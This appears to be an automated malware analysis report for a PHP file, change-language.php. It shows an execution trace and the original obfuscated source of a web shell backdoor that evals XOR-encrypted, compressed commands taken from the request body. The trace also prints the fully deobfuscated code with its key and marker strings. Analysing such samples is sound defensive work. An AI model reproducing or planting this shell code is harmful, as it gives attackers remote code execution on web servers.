PHP Malware Analysis

change-language.php

md5: 6980dbc3df4a8bc2e6da6a2321a0e6bc

Jump to: 

Screenshot
Attributes
Encoding

Execution

Files

Input

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/6980dbc3df4a8bc2e6da6a2321a0e6bc_trace-1676246074.381.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:55:00.278785]
1	0	1	0.000137	393608
1	3	0	0.000200	396784	{main}	1		/var/www/html/uploads/change-language.php	0	0
1		A						/var/www/html/uploads/change-language.php	2	$F = '<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl'
1		A						/var/www/html/uploads/change-language.php	3	$p = 'en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$'
1		A						/var/www/html/uploads/change-language.php	4	$j = '=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode('
1		A						/var/www/html/uploads/change-language.php	5	$P = '$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA'
2	4	0	0.000281	396784	str_replace	0		/var/www/html/uploads/change-language.php	6	3	'jZ'	''	'crejZatjZe_jZfujZnjZctjZion'
2	4	1	0.000298	396920
2	4	R			'create_function'
1		A						/var/www/html/uploads/change-language.php	6	$U = 'create_function'
1		A						/var/www/html/uploads/change-language.php	7	$G = 'cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<'
1		A						/var/www/html/uploads/change-language.php	8	$s = 'j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat'
1		A						/var/www/html/uploads/change-language.php	9	$E = 'se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}'
1		A						/var/www/html/uploads/change-language.php	10	$l = '$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba'
2	5	0	0.000383	397464	str_replace	0		/var/www/html/uploads/change-language.php	11	3	'A<'	''	'$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strlen($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_matcA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode($mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();'
2	5	1	0.000420	398072
2	5	R			'$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/change-language.php	11	$i = '$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000477	397336	create_function	0		/var/www/html/uploads/change-language.php	12	2	''	'$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000558	405408	{internal eval}	1		/var/www/html/uploads/change-language.php	12	0
3	7	1	0.000573	405408
3	7	R			NULL
2	6	1	0.000588	404040
2	6	R			'\000lambda_12'
1		A						/var/www/html/uploads/change-language.php	12	$Q = '\000lambda_12'
2	8	0	0.000616	403976	__lambda_func	1		/var/www/html/uploads/change-language.php	12	0
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$k = 'eea445c2'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$kh = 'a063b6a58c4e'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$kf = 'bc83e72cfec1'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$p = 'X82pUNLVe0K1J97g'
3	9	0	0.000681	404032	file_get_contents	0		/var/www/html/uploads/change-language.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000702	404768
3	9	R			''
3	10	0	0.000715	404752	preg_match	0		/var/www/html/uploads/change-language.php(12) : runtime-created function	1	3	'/a063b6a58c4e(.+)bc83e72cfec1/'	''	NULL
3	10	1	0.000774	404912
3	10	R			0
2	8	1	0.000791	404672
1	3	1	0.000798	404672
			0.000825	321920
TRACE END   [2023-02-12 21:55:00.279503]


Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$F='<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
$p='en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
$j='=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
$P='$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
$U=str_replace('jZ','','crejZatjZe_jZfujZnjZctjZion');
$G='cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
$s='j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
$E='se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
$l='$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
$i=str_replace('A<','',$P.$F.$p.$s.$G.$j.$l.$E);
$Q=$U('',$i);$Q();
?>